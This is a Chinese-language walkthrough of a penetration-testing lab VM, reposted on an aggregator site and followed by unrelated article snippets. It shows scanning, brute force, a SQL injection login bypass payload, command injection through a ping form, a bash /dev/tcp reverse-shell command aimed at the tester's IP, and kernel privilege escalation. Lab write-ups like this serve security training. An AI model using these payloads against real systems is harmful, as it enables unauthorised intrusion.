行业公司网站建设国际新闻视频

pingmian/2025/10/15 4:16:40/文章来源:
行业公司网站建设,国际新闻视频,莱芜手机网站建设电话,WordPress中菜单变色目录 环境配置 端口扫描 漏送发现 漏送利用 提权#xff08;内核漏洞提权#xff09; 环境配置 环境配置的过程同主页该专栏第一个靶场#xff0c;不在赘述。 端口扫描 首先通过arp-scan并根据靶机的mac地址确定靶机的IP地址 然后对靶机进行一个扫描 首先扫描到OpenS…目录 环境配置 端口扫描 漏送发现 漏送利用 提权内核漏洞提权 环境配置 环境配置的过程同主页该专栏第一个靶场不在赘述。 端口扫描 首先通过arp-scan并根据靶机的mac地址确定靶机的IP地址 然后对靶机进行一个扫描 首先扫描到OpenSSH 3.9p1 (protocol 1.99)这个是什么意思呢 Openssh是一个使用ssh协议进行通信的软件3.9p1是他的版本号后面的ptotocol表示openssh所支持的ssh版本1和版本2. Apache就不用多说了中间件嘛 111端口的rpcbind服务是rpc服务的守护进程也就是服务端而2应该是他的版本#100000表示rpc程序服务编号为100000。 623端口开放的服务为status这个跟NFS协议有关status是NFS RPC服务的一部分而NFS协议客户端和服务端之间的通信是通过RPC协议来进行的。如果开放了这个服务的话可以看一下有没有NFS协议如果有的话可以看一下存不存在NFS共享信息泄露。这里不存在。 631端口开放的ipp是一种允许计算机通过网络进行打印的协议而CUPS是一个用于管理打印任务的软件系统1.1是版本号 3306的mysql就不用多说了数据库。 漏送发现 由于这里发现nmap扫描到MySQL存在未授权登录尝试登录一下提示我的IP不能登录判断应该靶机设置的只能本机登录。 利用hydra爆破一下ssh和mysql当然也是不行的预料之中 根据nmap扫到的 利用dirsearch进行一下目录扫描 在扫描目录之前也通过nmap得到的版本号通过searchsploit进行历史漏洞的搜寻无果。 访问一下扫描到的manual/index.html好像没有什么用处 由于靶机开启了http服务直接访问可以看到是一个登录框遇到这里一般可以测一下爆破和注入。因为我们是需要拿权限所以这里XSS之类的就不测了。 漏送利用 直接用最常用的万能密码尝试绕过登录验证直接就绕过了。 账号root or 1 1 密码root or 1 1 bp抓一下包在框里填什么它都会去帮你ping那明显就可以利用管道符让他帮我们执行命令感觉这里跟CTF比较像 这里尝试读取密码读取不成功考虑到对某些命令进行了过滤于是我尝试了很多中下载命令但是都不行base64编码和url编码也是不行于是尝试在kali上面利用python开启http服务在这里利用wget去下载后门也是不行。 索性用插件生成一个反弹shell的命令然后直接反弹。 这里执行命令 127.0.0.1 | bash -c exec bash -i /dev/tcp/192.168.253.145/6666 1 提前监听6666端口也是成功的反弹了shell权限是低权限尝试提权。 提权内核漏洞提权 首先查看一下linux内核版本以及操作系统是什么发行版搜集一下信息。 内核版本是2.6.9发行版是centos4.5 根据内核版本去搜一下漏洞类型为本地的就一个但是版本也不符合 地址Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers 通过发型版本去搜一下刚好有一个提权漏洞。版本符合。先将POC下载到本地然后在kali上开启http服务在靶机上下载下来。 Python起http服务 这里在有两个问题因为在打靶机的时候使用了bp默认监听8080端口那使用python开启http服务时默认也是8080端口会提示启动不了。可以换个端口 第二个就是在下载C文件时会提示没有权限写入然后不断换目录去下载一直不行最后到tmp目录下载成功。 这里tmp目录可以写入是因为他是存放临时文件的目录一般所有用户都可以读取和写入。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/87902.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

石家庄网站建设推广服务建设品牌网站

ShiftCtrlO vs code 提供很强大的功能,就是可以快速查文件中的符号列表和函数列表,我们首先打开一个源码文件,比tcp.c,然后我们通过快捷键“ShiftCtrlO”即可打开对应源码文件的符号列表和函数列表,通过查看这些列表&a…

网站建设客网站商标注册号在哪个位置

一、本文介绍 本文给大家带来的改进机制是HAttention注意力机制,混合注意力变换器(HAT)的设计理念是通过融合通道注意力和自注意力机制来提升单图像超分辨率重建的性能。通道注意力关注于识别哪些通道更重要,而自注意力则关注于图…

大力推广建设电子商务网站技术定制网站设计公司

相关文章 sql 的 join、left join、full join的区别图解总结,测试,注意事项 1. 结论示意图 对于intersect、minus,oracle支持,mysql不支持,可以变通(in或exists)实现 2.测试 2.1.创建表和数…

wordpress 获取分类目录seo网站推广技术

今日任务 62.不同路径 63. 不同路径 II 62.不同路径 - Medium 题目链接:力扣(LeetCode)官网 - 全球极客挚爱的技术成长平台 一个机器人位于一个 m x n 网格的左上角 (起始点在下图中标记为 “Start” )。 机器人每次只…

dw如何用表格做网站医疗网站前置审批要多长时间

前言: OceanBase Cloud Platform(简称OCP),是 OceanBase数据库的专属企业级数据库管理平台。 在实际生产环境中,OCP的安装通常是第一步,先搭建OCP平台,进而依赖OCP来创建、管理和监控我们的生…

php网站建设流程凡科电脑版登录首页

3妹:2哥,你有没有看到新闻“18岁父亲为4岁儿子落户现身亲子鉴定” 2哥 : 啥?18岁就当爹啦? 3妹:确切的说是14岁好吧。 2哥 : 哎,想我30了, 还是个单身狗。 3妹:别急啊, 2…

用asp做网站系统步骤做社区生意的网站

来源:北京城市实验室BCL随着计算机技术的飞速发展,城市信息学作为城市规划领域的一门新兴学科,逐渐引起学术界的关注。城市信息学的兴起给城市规划带来了新的压力,但它也提供了新的城市分析视角。在此背景下,专家小组概…

邢台网站推广专业服务公司展厅效果图

背景为了兼容多种业务,想在项目中使用一些设计模式,以便于管理。例如,我需要创建用户并返回userid,每种业务创建的方式都不一样。我选取了“适配器模式”,但是我发现,在springmvc的管理下,常常需…

互联网精准营销公司seo 费用

文章目录求余函数和取模函数的区别x 和 y 符号不同,求余数和模数的技巧求余的运算规律(技巧)取模的运算规律(技巧)求余函数和取模函数的区别 求余函数rem(x,y) 和取模函数 mod(x,y) 的区别: 当 x 和 y 的符…

做 网络网站烟台市建设工程质量监督站网站

让我们聊聊这个话题, django如何存数据至mysql数据表里面,你会用什么方法?正常情况下,我们form逻辑处理后,直接form.save(),是,这个方法没毛病;但有没有其他的方法呢?假如…

曲阜网站建设哪家好有自建服务器做网站的吗

「何」到底该读「なん」还是「なに」? 首先,讲一个规律,大家记住就行。当「何」后面所接单词的第一个发音在“た”、“だ”、“な”行时,读作“なん”。一般这种情况下,后面跟的是の、でも、です和だ。 用例&#xff…

node.js做网站开发彩票游戏网站建设

说到国外Lead广告联盟,可能很多人会问这是啥?其实呢,作为搞外贸的,如果你想增加你的收入,做国外广告联盟也是不错的选择,只要你有正确的方法和策略,就能够成功赚取丰厚的佣金。今天龙哥我就给大…

网站支付怎么做安全吗都兰县建设局交通局网站

在POE供电系统实际应用中,有很多受电设备AP或移动基站的基站AP与天线,经常要安装于建筑物的高端点,因此这些受电设备也成为遭受雷击的高发点。所以,对于这类的数据网络中心,不仅要考虑建设良好的直击雷防护网与良好的接…

临桂城乡建设局网站新氧整形网站开发模版

一、进程考虑一个场景:浏览器,网易云音乐以及notepad 三个软件只能顺序执行是怎样一种场景呢?另外,假如有两个程序A和B,程序A在执行到一半的过程中,需要读取大量的数据输入(I/O操作),而此时CPU只…

o2o电商网站建设南山建站公司

一、实验名称: 网络分析 二、实验目的: 通过本实验练习,掌握空间数据网络分析的基本方法。 三、实验内容和要求: 实验内容: 利用ARCGIS软件网络分析工具及相关空间数据,查找距离“名人故居”、“博物…

山东住房和城乡建设厅网站网站 没有域名需要备案吗

ElasticSearch基础篇 安装 官网 下载地址 下载完成后对文件进行解压,项目结构如下 进入bin目录点击elasticsearch.bat启动服务 9300 端口为 Elasticsearch 集群间组件的通信端口, 9200 端口为浏览器访问的 http协议 RESTful 端口 打开浏览器&#…

怎样看网站的建设时间90设计网站官网入口

目录 介绍静态库与动态链接库静态库动态链接库 如何将第三方库集成到VS上VS属性管理器配置静态库配置动态链接库属性管理器其他的内容MKL库的安装boost库的安装 介绍 众所周知,.c文件或者.cpp文件变成.exe文件需要经历四个过程 分别是预处理,编译&#…

jsp网站开发技术自学做网站可以赚钱吗

数字包括文本型数字和数值型数字两种形式,数值型数字可以计算,文本型数字不能计算。 例1:文本型数字不能计算 例2:数值型数字可以计算 数值型数字如果输入大于11位数,则会显示为科学计数法。如果输入001,则…

帮客户做网站 没签合同咋办合肥软件开发公司

表对象标识 kingbase中表作为数据库对象具有一个系统内部的唯一标识符,这个标识符被称为oid(对象标识符),它是kingbase用来在整个数据集群中唯一地标识每个数据库对象的一个字段。对于表来说,其OID可以在系统目录表sy…

广州网站开发哪家专业江阴企业网站制作

Python中的Numpy的基本知识 Copyright © Microsoft Corporation. All rights reserved. 适用于License版权许可 更多微软人工智能学习资源,请见微软人工智能教育与学习共建社区 以下列出一些关于Numpy矩阵运算的基本知识和坑点。 首先需要在命令行中安装Num…